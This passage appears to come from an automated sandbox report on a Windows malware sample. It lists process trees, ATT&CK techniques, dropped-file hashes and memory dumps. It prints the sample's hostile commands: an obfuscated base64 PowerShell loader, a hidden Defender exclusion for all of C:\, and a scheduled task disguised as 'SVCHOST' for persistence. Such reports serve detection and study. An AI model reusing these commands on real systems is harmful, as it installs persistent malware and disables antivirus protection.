Z3Z5YXlxdGVibG95cmRmcW5mdGc9cWRuaW52d29meG1jbXRiIChyeWJ2cGRpZ2Vhc3dleXAgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkbWx0dHd2a2JreWltcGhqdHl3amZ2ZnB1c1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt0b3p1Y2lhcXFzeXRjZHhoZGt0emZ4cGVsICR5ZnF4aW10bnhlZGNrcnF6YnJxYXFwZmFnICRudWxsO3RvenVjaWFxcXN5dGNkeGhka3R6ZnhwZWwgJHFvYWx1Z3Z5YXlxdGVibG95cmRmcW5mdGcgKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:972
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "SVCHOST" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2128
    - - C:\Users\Admin\AppData\Roaming\svchost\Chromesa.exe
        
        "C:\Users\Admin\AppData\Roaming\svchost\Chromesa.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4944

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2508

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
332B

MD5
c1e31ebd017a03bb92082fe118d024c1

SHA1
13403a410996090f106597552f373f6314b352dc

SHA256
23b83d64338da71704f3d6fbc669edcd32052e7d3b5f6c2ee92c5749a4bed8d0

SHA512
3b9c0ea6e244873ccdb8e34ee83e706bdcda2b9df3763d0e7d465b799f9b92bbffd93c9a5b48d5bda5ef18a3c72f0e5cd9b3957f832361053468ca93bfb657e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
215fa5932830c64a7049274a3716ba58

SHA1
19b3835fe5674c620bbac144e3b042fa89c54070

SHA256
7fcdd9641321e0b0fc76cab08a789125783bbe07d752ca14bc6184c4fd381986

SHA512
5a04070b08d0e459949190d8238684e0b2b8a5b7cad16041724e8913b6591944abfb535f849d17d0714c2f9a34910ac8147100978848061fd83600e4b9eb1803

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES90F5.tmp

Filesize
1KB

MD5
1a9ac37b9844d17eaea785b1bfc2d9b4

SHA1
a78078cf9d18170c5ae3e97e763df99e58f7642d

SHA256
ba42875a1aec294013f16540c1ae6325efedbf50d18879e9de36fd7421bac72d

SHA512
0f29c378c9ba190e0271d8a2afec45f175491dab775480c136aa3f78e292a03e7787c852d04a8e549369b1ecb7a4107b3ff8a9042ea22de480920082b7b77afa

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ti2g34gu.ygb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\c.bat

Filesize
269KB

MD5
39deca1fb15765418419fce7b403616c

SHA1
e5cbb0a8b87788c35805327422e5bbb86fe68e7b

SHA256
6efe42275d533302ad3166470f6b72867fa8f62285df8ec7d446dd80ac2a23b0

SHA512
922a7d1c4b52aa42b82f0ef316b6e19dcd9e97e766c043404f76dd727c46ef90a14f60426fc737d9f8adfb974ba266d44688934b4a5e8fea7912afc976381deb

Download Submit
C:\Users\Admin\AppData\Local\Temp\yo4fh4jk\yo4fh4jk.dll

Filesize
4KB

MD5
a51f8e878ccc6c4ee9aef457fed15b44

SHA1
2cdfde0cfb83a3288c4850efbe3268ce4697991a

SHA256
4cb61d0b19e01729e9a56fe0c97f5c3284454f0079f20e8f02faac97c600c277

SHA512
bad2d7ca66a92fc7f6cdb55890ac484d3a26076e434fff40e50174a7d40aa5eea4e457de31262c6a132f1dd61d8d9df10dbe09b2bbf64d53bc51fe0315e48fb8

Download Submit
C:\Users\Admin\AppData\Roaming\svchost\Chromesa.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\windows\temp\201iw2pa.inf

Filesize
663B

MD5
27581dbbe3c3840ce72f99c21071898a

SHA1
898afeb9523df9367c74a01c0dbecf6b637f3cb1

SHA256
c5f2bbdebccd52c3eba3c97a251ffa2ccd01f64de764e560f804045fe868d27b

SHA512
0b9c4531e8be5b292638cb2cad7fd1b72ed3f1aa20ea027b9a013a8bfb2daaa4a25a40c37423e0924d110bbbbfad4a6e21aa03f4694978d205d7ac9739567d9f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yo4fh4jk\CSCBE11CDA968A74F3FAED0B4269BA7DED9.TMP

Filesize
652B

MD5
93b852b115c65828704efbc75b513bcb

SHA1
328f18789ae7bf60a915e9077d6e57bf52e3f07f

SHA256
8026b74bcb3abb4568df489d7ec8d339c7726ce7a5cc887af2d8f57139371e05

SHA512
2ba43fee0fb54d56858b3543f01a2f51fd57cf9fdefe8ac8aa3b47aa4acba3f3033b918b9c8502d824298c98a865e277fb78ea89068002c4d74b468913c71608

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yo4fh4jk\yo4fh4jk.0.cs

Filesize
2KB

MD5
b8106096972fb511e0cf8b99386ecf93

SHA1
3003ba3a3681ba16d124d5b2305e6cc59af79b44

SHA256
49d2a0f78cbec3d87396b6f52f791c66505edeec87a70d4ce45721288210da02

SHA512
218bd9cd17c56d2e138205a197780cc2a5a81bfce7d5439eecb168f61955ba97793e7333425c064f6b6337e1f70c75bd373a7fb502a8c538fb046600018f871e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yo4fh4jk\yo4fh4jk.cmdline

Filesize
369B

MD5
da9a3f626aeb19940eef51e92efe064a

SHA1
4bd0616daaf73fc83879889e1aec43b317c1e048

SHA256
e6cfa5f82bce8628c9cebf2785f946aaf36d2dcf29cd931a3b9fa63bb3076c62

SHA512
1d822292f1c3974347e6bad8243f86197f9e4b1efabd52ec8477ba3faad9cc9de8b538d87bff876958ca1d46879f42879bf24b01324288cd614e3ad827fa38f5

Download Submit
memory/972-59-0x00000000057B0000-0x0000000005816000-memory.dmp

Filesize
408KB

Download
memory/972-76-0x0000000070F90000-0x0000000070FDC000-memory.dmp

Filesize
304KB

Download
memory/972-105-0x0000000008A60000-0x0000000008A9C000-memory.dmp

Filesize
240KB

Download
memory/972-104-0x0000000008A00000-0x0000000008A12000-memory.dmp

Filesize
72KB

Download
memory/972-103-0x0000000007F00000-0x0000000007F92000-memory.dmp

Filesize
584KB

Download
memory/972-102-0x0000000007E00000-0x0000000007E5E000-memory.dmp

Filesize
376KB

Download
memory/972-99-0x00000000083B0000-0x0000000008954000-memory.dmp

Filesize
5.6MB

Download
memory/972-55-0x00000000049F0000-0x0000000004A26000-memory.dmp

Filesize
216KB

Download
memory/972-56-0x0000000005110000-0x0000000005738000-memory.dmp

Filesize
6.2MB

Download
memory/972-57-0x0000000004EC0000-0x0000000004EE2000-memory.dmp

Filesize
136KB

Download
memory/972-58-0x0000000005060000-0x00000000050C6000-memory.dmp

Filesize
408KB

Download
memory/972-98-0x00000000073F0000-0x0000000007424000-memory.dmp

Filesize
208KB

Download
memory/972-69-0x0000000005860000-0x0000000005BB4000-memory.dmp

Filesize
3.3MB

Download
memory/972-97-0x0000000004D50000-0x0000000004D58000-memory.dmp

Filesize
32KB

Download
memory/972-71-0x0000000005D90000-0x0000000005DAE000-memory.dmp

Filesize
120KB

Download
memory/972-72-0x0000000005DE0000-0x0000000005E2C000-memory.dmp

Filesize
304KB

Download
memory/972-73-0x00000000076E0000-0x0000000007D5A000-memory.dmp

Filesize
6.5MB

Download
memory/972-74-0x0000000006E80000-0x0000000006E9A000-memory.dmp

Filesize
104KB

Download
memory/972-75-0x0000000007460000-0x0000000007492000-memory.dmp

Filesize
200KB

Download
memory/972-95-0x0000000007660000-0x0000000007668000-memory.dmp

Filesize
32KB

Download
memory/972-77-0x0000000071140000-0x0000000071494000-memory.dmp

Filesize
3.3MB

Download
memory/972-87-0x00000000074A0000-0x00000000074BE000-memory.dmp

Filesize
120KB

Download
memory/972-88-0x00000000074D0000-0x0000000007573000-memory.dmp

Filesize
652KB

Download
memory/972-89-0x00000000075D0000-0x00000000075DA000-memory.dmp

Filesize
40KB

Download
memory/972-90-0x0000000007D60000-0x0000000007DF6000-memory.dmp

Filesize
600KB

Download
memory/972-91-0x00000000075E0000-0x00000000075F1000-memory.dmp

Filesize
68KB

Download
memory/972-92-0x0000000007610000-0x000000000761E000-memory.dmp

Filesize
56KB

Download
memory/972-93-0x0000000007630000-0x0000000007644000-memory.dmp

Filesize
80KB

Download
memory/972-94-0x0000000007670000-0x000000000768A000-memory.dmp

Filesize
104KB

Download
memory/2760-30-0x000002091A790000-0x000002091A798000-memory.dmp

Filesize
32KB

Download
memory/2760-14-0x000002097E560000-0x000002097E582000-memory.dmp

Filesize
136KB

Download
memory/2760-15-0x00007FFEBA400000-0x00007FFEBAEC1000-memory.dmp

Filesize
10.8MB

Download
memory/2760-52-0x00007FFEBA400000-0x00007FFEBAEC1000-memory.dmp

Filesize
10.8MB

Download
memory/2760-16-0x00007FFEBA400000-0x00007FFEBAEC1000-memory.dmp

Filesize
10.8MB

Download
memory/2760-17-0x000002097E500000-0x000002097E51C000-memory.dmp

Filesize
112KB

Download
memory/2760-48-0x00007FFEBA400000-0x00007FFEBAEC1000-memory.dmp

Filesize
10.8MB

Download
memory/2760-47-0x00007FFEBA403000-0x00007FFEBA405000-memory.dmp

Filesize
8KB

Download
memory/2760-4-0x00007FFEBA403000-0x00007FFEBA405000-memory.dmp

Filesize
8KB

Download